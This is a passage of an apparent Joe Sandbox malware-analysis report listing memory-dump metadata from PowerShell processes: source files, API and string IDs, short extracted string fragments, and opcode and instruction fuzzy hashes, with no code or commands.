                                                                                                        • Instruction Fuzzy Hash: 83F0597B71221507E710CD2AADC452BB766EBC6324B1A413AE841E7280C8B8F806E268
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5f598ddf24c88ad89c7c45594c75e1d5ada9c623ee80a9beea1eac979a575e47
                                                                                                        • Instruction ID: 7cde1d795a2325f791a2591a45a126e857c19a369b5f8500d9a8cad991568fbd
                                                                                                        • Opcode Fuzzy Hash: 5f598ddf24c88ad89c7c45594c75e1d5ada9c623ee80a9beea1eac979a575e47
                                                                                                        • Instruction Fuzzy Hash: 8401A9796457068FE315CF14D850BA6B7F2AF86308F4A947E8082C7392EA79A459C709
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString
                                                                                                        • String ID: &2$0$92$<2$F2$G2$I2$J2$K2$P2$S2$S2$U2$V2$Y2$Y2$_2$rBW$1
                                                                                                        • API String ID: 2525500382-1704840789
                                                                                                        • Opcode ID: 6ceb89d6d5e4c09f3b9326815a3f473e67c1d16999f192d9aa92e0c138436fed
                                                                                                        • Instruction ID: b48d8866ef7672cf2c0e1fe15cec0ebcc93c84dfb12a9cd0e8d39250c797a1d1
                                                                                                        • Opcode Fuzzy Hash: 6ceb89d6d5e4c09f3b9326815a3f473e67c1d16999f192d9aa92e0c138436fed
                                                                                                        • Instruction Fuzzy Hash: 9F61C532A2D7508AD368CF78CA0139BB6E1BFC5300F15A96DD4D99B364EB748901C74B
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit
                                                                                                        • String ID: Q0$e0$f0$g0$q0$s0$u0$v0$z0$~0
                                                                                                        • API String ID: 2610073882-1706572778
                                                                                                        • Opcode ID: 6c4633c437742d5ea02f2b05637dc49c13de568e3c4b056a3204ae06464dd71b
                                                                                                        • Instruction ID: 6a188afcc4417f1c0665edfbb67c2855a393ec20af716859af6148eab1d08b1b
                                                                                                        • Opcode Fuzzy Hash: 6c4633c437742d5ea02f2b05637dc49c13de568e3c4b056a3204ae06464dd71b
                                                                                                        • Instruction Fuzzy Hash: B331037951C3808BD328DF25C0957EBB7E1AF98700F00882DD5C98B3A1EBB54688CB47
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3139939950.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$4'sq$4'sq
                                                                                                        • API String ID: 0-1617174353
                                                                                                        • Opcode ID: 33b86dec3237f9335284e389554b7054c1e282b4d9aa20fe9b09cd8103eaa1ee
                                                                                                        • Instruction ID: 90f86fb9e575f5717099d06f521f04888b11c5479cd3ee89d4f4d3747cccabc1
                                                                                                        • Opcode Fuzzy Hash: 33b86dec3237f9335284e389554b7054c1e282b4d9aa20fe9b09cd8103eaa1ee
                                                                                                        • Instruction Fuzzy Hash: F91237F1B042199FCB159B68C81077BBBA6AFD2310F14806ADE25CF285DB36CD46C7A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3038670067.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_4f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 599ab3f884dc544b12580a5155257379c597cb4c41544cea9cd82157adc5237f
                                                                                                        • Instruction ID: 92c598fef9e7f9ee53862e426d647c258a93696d93816f12f7c89c7b40e84c16
                                                                                                        • Opcode Fuzzy Hash: 599ab3f884dc544b12580a5155257379c597cb4c41544cea9cd82157adc5237f
                                                                                                        • Instruction Fuzzy Hash: B9918C74A002458FCB15CF99C4949AEFBB2FF88310B258699D915AB365C735FC52CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3139939950.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8986c7a1708d3c6f5fe6c2011cae3d7c43a116dc80414b94247e7f1302572f00
                                                                                                        • Instruction ID: 8a4edc03924e0b61578c0779a4d6a7cd550747eac5838595f4d26f70e358cbe4
                                                                                                        • Opcode Fuzzy Hash: 8986c7a1708d3c6f5fe6c2011cae3d7c43a116dc80414b94247e7f1302572f00
                                                                                                        • Instruction Fuzzy Hash: C641F8F4B0021A9FCB218F28C95077ABBB2AFC1344F1580A9DD20DF256E736D946CB95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3038670067.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_4f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d8adf61c8447b8eb8848a3596f3e9af1020a491a346aab1fb9c471474350b248
                                                                                                        • Instruction ID: 8ea08457572bc23c53a342d38c47415c5ef0321dedecd91314c12a5b3c385d9a
                                                                                                        • Opcode Fuzzy Hash: d8adf61c8447b8eb8848a3596f3e9af1020a491a346aab1fb9c471474350b248
                                                                                                        • Instruction Fuzzy Hash: 914129B4A005459FCB09CF99C4989AEFBB1FF48310B168599D915AB364C732FC52CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3038670067.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_4f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0e80e800c03104cdf6205ce69582ee215cf07af3add3f87c3b45c65bb421507c
                                                                                                        • Instruction ID: 208b6c199a5bb9606e6bd9d41869df1b2ef7c55c05e45d20404ba5e6227f9a56
                                                                                                        • Opcode Fuzzy Hash: 0e80e800c03104cdf6205ce69582ee215cf07af3add3f87c3b45c65bb421507c
                                                                                                        • Instruction Fuzzy Hash: 092149B4A042499FCB01CF98C4809AABBB0FF89300B148596E905EB352C735EC46CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3038670067.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_4f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2f85322bcee28256583b84a243f6e2a7ce966b2377b6c3a28d596fb54a3ea4f8
                                                                                                        • Instruction ID: a10f590752c9fb5e737eff052a079fdf076a3ebbc224375e88c918a4d32f32ea
                                                                                                        • Opcode Fuzzy Hash: 2f85322bcee28256583b84a243f6e2a7ce966b2377b6c3a28d596fb54a3ea4f8
                                                                                                        • Instruction Fuzzy Hash: CF212C74A042499FCB01CF98D4809AEFBB1FF89310B158599E909EB352D731FD42CBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3036952584.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_4a3d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 095c5dec31bc078985b081776686144ae2a3824289019404aa1f0c6adf87ff5f
                                                                                                        • Instruction ID: c21525d2dd3d17976c7b0e07925b00b7e6707c669fdc1fe57c4e209208526795
                                                                                                        • Opcode Fuzzy Hash: 095c5dec31bc078985b081776686144ae2a3824289019404aa1f0c6adf87ff5f
                                                                                                        • Instruction Fuzzy Hash: 60012B71509300DAF7104F25ECC4B67BFA8DF42725F18C41AFD4A5B142E678A941CBB1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3036952584.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_4a3d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e222574cb3b3ec0ac5859b0160999caf01a4893db5cda0b10cf4ccd540cb09a
                                                                                                        • Instruction ID: 1425ce2fcbc084fb4ef2aff6b06d4cf6e19cc6151c9d25b592e50a171106bc26
                                                                                                        • Opcode Fuzzy Hash: 5e222574cb3b3ec0ac5859b0160999caf01a4893db5cda0b10cf4ccd540cb09a
                                                                                                        • Instruction Fuzzy Hash: EB019E6240E3C09EE7128B259894B52BFB4DF43225F1880CBE9888F1A3C2689849C772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3038670067.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_4f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2b4e446658c7df41c3413354a7c8971056b9070f3a14926b7dd602d51bac7294
                                                                                                        • Instruction ID: 26135dc76d25fb6fd0baca28f85d01cd70f66dc6a8652f30e17ce486f6078174
                                                                                                        • Opcode Fuzzy Hash: 2b4e446658c7df41c3413354a7c8971056b9070f3a14926b7dd602d51bac7294
                                                                                                        • Instruction Fuzzy Hash: 1CE04F356002559FDB04DF9CD8A04E8B760EF85334B2086DAD465971A2CA369916C756
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3139939950.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-2404318043
                                                                                                        • Opcode ID: ce7a3b77ee1b94e874b356820397323281c8f4ec5d737a8e121227ca5ab71eb9
                                                                                                        • Instruction ID: b181b14334c81cd5904ae86c8b1282c3b303e7abf0a570cd0a343067cb773484
                                                                                                        • Opcode Fuzzy Hash: ce7a3b77ee1b94e874b356820397323281c8f4ec5d737a8e121227ca5ab71eb9
                                                                                                        • Instruction Fuzzy Hash: 0DF116B1B042198FDB148BA8C41077ABBF6AFD5321F14807AD925CF641DB35D946CBA2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3139939950.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-2404318043
                                                                                                        • Opcode ID: 9079b76d475bc9f7e915cad643b35aaf488bff0bca4c758b0921fa0691981577
                                                                                                        • Instruction ID: 8b7b050aa0241e92093f926c02c572650e6596bf79e7c68c771eed70c491bb50
                                                                                                        • Opcode Fuzzy Hash: 9079b76d475bc9f7e915cad643b35aaf488bff0bca4c758b0921fa0691981577
                                                                                                        • Instruction Fuzzy Hash: 60A138B27083568FCB258B78941066BBBF5AFD2320F18807BD955CB692DB75CC41C7A2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3139939950.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-2855845837
                                                                                                        • Opcode ID: c491fc1a6663544d8ed4448c30a45df3a27618ab9c4ea2b767423c7934d18fd6
                                                                                                        • Instruction ID: 07f0a34debac7c40456bd38c8af4cb0ea684bb850218be2b5d3e6da6565e467e
                                                                                                        • Opcode Fuzzy Hash: c491fc1a6663544d8ed4448c30a45df3a27618ab9c4ea2b767423c7934d18fd6
                                                                                                        • Instruction Fuzzy Hash: FB216BB17043056BDF34567E9C4073BBBA66BC5798F648036ED15CB282DE36C8418361
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3139939950.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$$sq$$sq
                                                                                                        • API String ID: 0-148891389
                                                                                                        • Opcode ID: 321788d3c75eae421df2c1d11c386e9a6948e991f50335ddb20fe999b885d3cb
                                                                                                        • Instruction ID: bfde5a2fa8be711d0709d9eda96677dac20acbafd73402c0bf7141739df168d1
                                                                                                        • Opcode Fuzzy Hash: 321788d3c75eae421df2c1d11c386e9a6948e991f50335ddb20fe999b885d3cb
                                                                                                        • Instruction Fuzzy Hash: 2A017CB170D3D58FC727537818201676FB26FC361075A0097E591CF297DA798E0A83A3